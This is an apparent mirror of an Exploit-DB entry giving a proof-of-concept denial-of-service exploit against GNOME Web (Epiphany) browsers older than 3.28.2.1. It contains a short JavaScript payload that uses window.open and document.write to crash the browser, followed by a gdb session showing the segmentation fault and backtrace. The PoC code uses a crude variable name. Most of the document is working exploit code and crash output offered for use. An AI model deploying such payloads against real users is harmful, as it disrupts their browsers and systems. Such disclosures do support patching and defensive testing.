Gnome Web (Epiphany) < 3.28.2.1 - Denial of Service

• Exploit Database
• 33 阅读

• 作者： rop
  日期： 2018-06-08
• 类别：

  • dos
  平台：

  • linux
• 来源：https://www.exploit-db.com/exploits/44857/

• # Title: Gnome Web/Epiphany Browser < 3.28.2.1 - DoS App Crash (PoC)
  # Exploit Author: https://github.com/ldpreload
  # Date: 2018-06-06
  # Link: https://wiki.gnome.org/Apps/Web
  # Version: 3.28.2.1
  
  <!>
  
  libephymain.so in GNOME WEB/Epiphany < 3.28.2.1 allows a remote attacker to cause a Denial Of Service and crash the users browser. The cause of this is the "document.write"
  
  <!>
  
  PoC:
  
  <script>
  b1tch3z = window.open("https://www.google.com", "bl1ngbl1ng", "width=250,height=250");
  b1tch3z.document.write("<p>~ua b1tch3z</p>");
  
  // https://github.com/undergroundagency
  // https://github.com/ldpreload
  </script>
  
  Video PoC:
  https://vimeo.com/273769801
  
  <!>
  
  ld@b1tch3z:~$ gdb epiphany
  (gdb) run
  Starting program: /usr/bin/epiphany
  [Thread debugging using libthread_db enabled]
  Using host libthread_db library "/usr/lib/libthread_db.so.1".
  
  [New Thread 0x7fffdf7ab700 (LWP 23486)]
  [New Thread 0x7fffdd929700 (LWP 23487)]
  [New Thread 0x7fffdd128700 (LWP 23488)]
  [New Thread 0x7fffd7fff700 (LWP 23489)]
  [New Thread 0x7fffd77fe700 (LWP 23490)]
  [New Thread 0x7fffd6ffd700 (LWP 23491)]
  [New Thread 0x7fffd67fc700 (LWP 23492)]
  [New Thread 0x7fffd5ffb700 (LWP 23493)]
  [New Thread 0x7fffd57fa700 (LWP 23494)]
  [New Thread 0x7fff8b4c4700 (LWP 23499)]
  [New Thread 0x7fff899bc700 (LWP 23503)]
  [New Thread 0x7fff88fff700 (LWP 23506)]
  [New Thread 0x7fff6bfff700 (LWP 23507)]
  [New Thread 0x7fff6ae5f700 (LWP 23514)]
  [New Thread 0x7fff6a65e700 (LWP 23521)]
  
  [Thread 0x7fff6a65e700 (LWP 23521) exited]
  [Thread 0x7fffd5ffb700 (LWP 23493) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23527)]
  [New Thread 0x7fff6a65e700 (LWP 23528)]
  [New Thread 0x7fff691f6700 (LWP 23529)]
  [New Thread 0x7fff689f5700 (LWP 23530)]
  [New Thread 0x7fff43fff700 (LWP 23531)]
  [New Thread 0x7fff3b7fe700 (LWP 23532)]
  [New Thread 0x7fff437fe700 (LWP 23533)]
  [Thread 0x7fff3b7fe700 (LWP 23532) exited]
  [Thread 0x7fff899bc700 (LWP 23503) exited]
  [Thread 0x7fff691f6700 (LWP 23529) exited]
  [Thread 0x7fff689f5700 (LWP 23530) exited]
  [Thread 0x7fff437fe700 (LWP 23533) exited]
  [Thread 0x7fff43fff700 (LWP 23531) exited]
  [Thread 0x7fff6a65e700 (LWP 23528) exited]
  [New Thread 0x7fff6a65e700 (LWP 23557)]
  [Thread 0x7fffd5ffb700 (LWP 23527) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23566)]
  [Thread 0x7fff6a65e700 (LWP 23557) exited]
  [Thread 0x7fffd5ffb700 (LWP 23566) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23591)]
  [New Thread 0x7fff6a65e700 (LWP 23592)]
  [Thread 0x7fffd5ffb700 (LWP 23591) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23597)]
  [Thread 0x7fffd5ffb700 (LWP 23597) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23612)]
  [Thread 0x7fff6a65e700 (LWP 23592) exited]
  [Thread 0x7fffd5ffb700 (LWP 23612) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23625)]
  [New Thread 0x7fff6a65e700 (LWP 23633)]
  [Thread 0x7fff6a65e700 (LWP 23633) exited]
  [New Thread 0x7fff6a65e700 (LWP 23644)]
  [Thread 0x7fff6a65e700 (LWP 23644) exited]
  [New Thread 0x7fff6a65e700 (LWP 23648)]
  [Thread 0x7fffd5ffb700 (LWP 23625) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23652)]
  [Thread 0x7fff6a65e700 (LWP 23648) exited]
  [New Thread 0x7fff6a65e700 (LWP 23656)]
  [Thread 0x7fff6a65e700 (LWP 23656) exited]
  [Thread 0x7fffd5ffb700 (LWP 23652) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23684)]
  [New Thread 0x7fff6a65e700 (LWP 23685)]
  [Thread 0x7fffd5ffb700 (LWP 23684) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23715)]
  [Thread 0x7fff6a65e700 (LWP 23685) exited]
  [New Thread 0x7fff6a65e700 (LWP 23741)]
  [Thread 0x7fffd5ffb700 (LWP 23715) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23773)]
  [Thread 0x7fffd5ffb700 (LWP 23773) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23811)]
  [Thread 0x7fff6a65e700 (LWP 23741) exited]
  [New Thread 0x7fff6a65e700 (LWP 23815)]
  [Thread 0x7fffd5ffb700 (LWP 23811) exited]
  [New Thread 0x7fffd5ffb700 (LWP 23823)]
  [Thread 0x7fff6a65e700 (LWP 23815) exited]
  
  Thread 43 "pool" received signal SIGSEGV, Segmentation fault.
  [Switching to Thread 0x7fffd5ffb700 (LWP 23823)]
  0x00007ffff77bcb2d in ?? () from /usr/lib/epiphany/libephymain.so
  
  (gdb) bt
  #00x00007ffff77bcb2d in() at /usr/lib/epiphany/libephymain.so
  #10x00007ffff6cb7e39 in() at /usr/lib/libgio-2.0.so.0
  #20x00007ffff7040463 in() at /usr/lib/libglib-2.0.so.0
  #30x00007ffff703fa2a in() at /usr/lib/libglib-2.0.so.0
  #40x00007fffefa70075 in start_thread () at /usr/lib/libpthread.so.0
  #50x00007ffff7b1453f in clone () at /usr/lib/libc.so.6